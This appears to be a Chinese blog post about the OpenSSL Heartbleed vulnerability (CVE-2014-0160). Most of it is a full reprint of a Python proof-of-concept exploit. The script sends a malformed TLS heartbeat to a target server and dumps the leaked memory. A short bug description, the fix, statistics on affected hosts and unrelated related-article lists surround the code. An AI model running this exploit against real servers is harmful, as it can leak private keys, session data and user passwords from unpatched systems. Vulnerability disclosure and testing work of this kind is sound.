在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

Exploit:

openssl.py

 #!/usr/bin/python

 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

 # The author disclaims copyright to this source code.

 import sys

 import struct

 import socket

 import time

 import select

 import re

 from optparse import OptionParser

 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

 def h2bin(x):

     return x.replace(' ', '').replace('\n', '').decode('hex')

 hello = h2bin('''

 16 03 02 00  dc 01 00 00 d8 03 02 53

 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

 00 0f 00 01 01

 ''')

 hb = h2bin('''

 18 03 02 00 03

 01 40 00

 ''')

 def hexdump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b : b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

         print '  %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def recvall(s, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         r, w, e = select.select([s], [], [], 5)

         if s in r:

             data = s.recv(remain)

             # EOF?

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     return rdata

 def recvmsg(s):

     hdr = recvall(s, 5)

     if hdr is None:

         print 'Unexpected EOF receiving record header - server closed connection'

         return None, None, None

     typ, ver, ln = struct.unpack('>BHH', hdr)

     pay = recvall(s, ln, 10)

     if pay is None:

         print 'Unexpected EOF receiving record payload - server closed connection'

         return None, None, None

     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

     return typ, ver, pay

 def hit_hb(s):

     s.send(hb)

     while True:

         typ, ver, pay = recvmsg(s)

         if typ is None:

             print 'No heartbeat response received, server likely not vulnerable'

             return False

         if typ == 24:

             print 'Received heartbeat response:'

             hexdump(pay)

             if len(pay) > 3:

                 print 'WARNING: server returned more data than it should - server is vulnerable!'

             else:

                 print 'Server processed malformed heartbeat, but did not return any extra data.'

             return True

         if typ == 21:

             print 'Received alert:'

             hexdump(pay)

             print 'Server returned error, likely not vulnerable'

             return False

 def main():

     opts, args = options.parse_args()

     if len(args) < 1:

         options.print_help()

         return

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     print 'Connecting...'

     sys.stdout.flush()

     s.connect((args[0], opts.port))

     print 'Sending Client Hello...'

     sys.stdout.flush()

     s.send(hello)

     print 'Waiting for Server Hello...'

     sys.stdout.flush()

     while True:

         typ, ver, pay = recvmsg(s)

         if typ == None:

             print 'Server closed connection without sending Server Hello.'

             return

         # Look for server hello done message.

         if typ == 22 and ord(pay[0]) == 0x0E:

             break

     print 'Sending heartbeat request...'

     sys.stdout.flush()

     s.send(hb)

     hit_hb(s)

 if __name__ == '__main__':

     main()

来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

http://wooyun.org/bugs/wooyun-2014-055939

OpenSSL "heartbleed" 安全漏洞的更多相关文章

  1. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. 升级OpenSSL修复高危漏洞Heartbleed

    升级OpenSSL修复高危漏洞Heartbleed 背景:          OpenSSL全称为Secure Socket Layer.是Netscape所研发.利用数据加密(Encryption) ...

  5. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  6. OpenSSL Heartbleed原因小结

    User发送心跳报文给Server,Server复制心跳报文的内容回应User. memcpy(bp, p1, payload); Server拷贝心跳报文的内容给Client时,如果拷贝的字节数目超 ...

  7. OpenSSL心脏出血漏洞全回顾

    近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存 ...

  8. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  9. 对OpenSSL心脏出血漏洞的试验

    1.安装OpenSSL环境 sudo apt-get install openssl sudo pip install pyopenssl(中间会提示ffi.h 没有那个文件或目录,sudo apt- ...

随机推荐

  1. Elasticserach学习笔记-01基础概念

    本文系本人根据官方文档的翻译,能力有限.水平一般,如果对想学习Elasticsearch的朋友有帮助,将是本人的莫大荣幸. 原文出处:https://www.elastic.co/guide/en/e ...

  2. bzoj4817 [Sdoi2017]树点涂色

    Description Bob有一棵n个点的有根树,其中1号点是根节点.Bob在每个点上涂了颜色,并且每个点上的颜色不同.定义一条路 径的权值是:这条路径上的点(包括起点和终点)共有多少种不同的颜色. ...

  3. 【珍藏】linux 同步IO: sync、fsync与fdatasync

    传统的UNIX实现在内核中设有缓冲区高速缓存或页面高速缓存,大多数磁盘I/O都通过缓冲进行.当将数据写入文件时,内核通常先将该数据复制到其中一个缓冲区中,如果该缓冲区尚未写满,则并不将其排入输出队列, ...

  4. java并发程序——Excutor

    概述 Excutor这个接口用的不多,但是ThreadPoolExcutor这个就用的比较多了,ThreadPoolExcutor是Excutor的一个实现.Excutor体系难点没有,大部分的关键点 ...

  5. Python:字符串的分片与索引、字符串的方法

    这是关于Python的第3篇文章,主要介绍下字符串的分片与索引.字符串的方法. 字符串的分片与索引: 字符串可以用过string[X]来分片与索引.分片,简言之,就是从字符串总拿出一部分,储存在另一个 ...

  6. 优化单页面开发环境:webpack与react的运行时打包与热更新

    前面两篇文章介绍初步搭建单页面应用的开发环境: 第一篇:使用webpack.babel.react.antdesign配置单页面应用开发环境 第二篇:使用react-router实现单页面应用路由 这 ...

  7. hdu2767强连通加缩点

    https://vjudge.net/contest/156688#problem/B 题目说了一大堆,前面的没有用,就是让你判断要加几条边才能强连通,用到缩点的知识 二重循环,判断邻接表下一个点是不 ...

  8. JS第二弹:用Jquery组装html标签,输出到页面

    用Ajax从服务端获取数据,遍历到表格中(其实将表格替换了),中间发现不能为新增的元素绑定事件,原来是没有将其作为JQ对象

  9. linux上安装tcl

    1. 首先下载安装包,推荐下载activetcl(对tcl源码进行了预编译,安装步骤简单).打开网址http://activestate.com找到activetcl的社区版(社区版是免费的,找到li ...

  10. 用ajax写分页查询-----2017-05-17

    要写分页,首先你得清楚,一页你想显示多少条信息?如何计算总共显示的页数? 先说一下思路: (1)从数据库读取数据,以chenai表为例,读取所有留言信息.并能够实现输入发送者,可以查询该发送者的留言总 ...